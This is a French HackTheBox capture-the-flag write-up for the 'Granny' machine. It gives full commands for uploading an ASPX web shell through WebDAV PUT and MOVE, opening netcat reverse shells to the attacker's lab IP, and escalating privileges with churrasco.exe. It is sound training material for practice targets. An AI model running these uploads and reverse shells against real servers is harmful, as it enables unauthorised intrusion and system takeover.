Granny HackTheBox (Writeup)

Skills:

Abusing PUT & MOVE Methods - Uploading Aspx WebShell
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow [RCE]
Token Kidnapping - Churrasco [Privilege Escalation]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.15 -oG allPorts

Scan de la version des ports avec Nmap :

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80 10.10.10.15 -oN targeted

Port 80 - HTTP

Vulnérabilité webDAV

Le port 80 est ouvert, et le serveur supporte WebDAV. Cela nous permet potentiellement de téléverser des fichiers via la méthode PUT et de les renommer avec MOVE.

Créez un fichier de test :

echo "this is a test" > test.txt

Connectez-vous au serveur avec l’outil cadaver :

cadaver 10.10.10.15

Essayez d’uploader le fichier avec la commande PUT :

Résultat : Succès.

Upload d’une WebShell

Copiez une WebShell ASPX préexistante :

cp /usr/share/davtest/backdoors/aspx_cmd.aspx .

Essayez de l’uploader directement :

put aspx_cmd.aspx

Résultat : Échec (le serveur bloque les fichiers avec l’extension .aspx).

Changez l’extension en .txt :

mv aspx_cmd.aspx cmd.txt

Réessayez l’upload:

PUT cmd.txt

Résultat : Succès.

Renommez le fichier avec MOVE pour rétablir l’extension :

move cmd.txt cmd.aspx

Accédez à la WebShell via le navigateur :

Reverse Shell via la WebShell :

Placez un exécutable Netcat dans le répertoire courant :

cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .

Lancez un serveur SMB pour partager le fichier :

smbserver.py smbFolder $(pwd) -smb2support

Mettez votre machine en écoute sur le port 443 :

sudo rlwrap nc -nvlp 443

Exécutez la commande de reverse shell depuis la WebShell :

\\10.10.14.30\smbFolder\nc.exe -e cmd 10.10.14.30 443

Élévation de privilèges :

Explotation du Kernel - Windows Server 2003

À l'aide de la commande systeminfo, nous constatons que l'équipement est très ancien (Windows Server 2003) :

systeminfo

Nous avons également le privilège SeImpersonatePrivilege, ce qui nous permet de tenter une élévation de privilèges.

Pour contourner cette limitation, nous allons utiliser l'outil churrasco.exe.

https://github.com/Re4son/Churrasco/raw/master/churrasco.exegithub.com

Transfert de fichier Windows (SMB)

Nous utilisons smbserver.py pour partager un répertoire contenant le fichier exploit 40627.exe Ce fichier est ensuite copié sur la machine cible.

smbserver.py share $(pwd) -smb2support

Depuis la machine cible, nous copions le fichier malveillant à l'aide de la commande SMB :

copy \\10.10.14.30\share\churrasco.exe churrasco.exe

Nous pouvons alors exécuter n'importe quelle commande avec ce binaire, par exemple :

.\churrasco.exe "whoami"

Établir une reverse shell

Pour établir une reverse shell, nous écoutons sur le port 443 :

sudo rlwrap nc -nvlp 443

Nous créons à nouveau un serveur SMB avec nc.exe :

smbserver.py share $(pwd) -smb2support

Enfin, nous exécutons la reverse shell avec la commande suivante :

.\churrasco.exe "\\10.10.14.30\share\nc.exe -e cmd 10.10.14.30 443"

Flag root.txt :)

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?